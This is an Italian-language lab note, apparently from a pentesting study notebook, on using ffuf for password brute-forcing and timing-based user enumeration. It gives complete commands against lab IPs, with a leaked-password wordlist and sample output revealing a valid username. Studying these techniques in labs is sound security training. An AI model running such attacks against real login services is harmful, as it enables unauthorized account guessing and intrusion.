tags: ffuf ffuf_bruteforce Enumerazione_Utenti_Bruteforce FFUF_Enumerazione_Utenti
Tramite questo programma possiamo anche effettuare attacchi bruteforce, ci basta recuperare i dati fondamentali tramite burpsuite e poi lanciare il seguente comando:
$ ffuf -u http://10.10.125.182/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'Dove con -X specifichi il metodo, con -d il valore della richiesta e con -H il custom header che a differenza di curl non riesce a trovare in automatico. Ovviamente il parametro con FUZZ è quello a cui andremo a fare l’attacco a dizionario.
User Enumeration Time Based
Tramite FFUF si può fare anche un’enumerazione utenti su un servizio di login che ha come vulnerabilità un ritardo tra autenticazione con username corretto e username scorretto nel seguente modo:
ffuf -w /opt/wordlists/SecList/Usernames/Names/names.txt -X POST -d '{"username":"FUZZ","password":"wrongpass"}' -H "Content-Type: application/json" -u http://10.10.48.17/api/user/login -mt ">500" -t 10
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.48.17/api/user/login
:: Wordlist : FUZZ: /opt/wordlists/SecList/Usernames/Names/names.txt
:: Header : Content-Type: application/json
:: Data : {"username":"FUZZ","password":"wrongpass"}
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 10
:: Matcher : Response time: >500
________________________________________________
james [Status: 200, Size: 42, Words: 4, Lines: 2, Duration: 1448ms]Dove con -mt indichi quanto tempo ci mette la risposta con username corretto.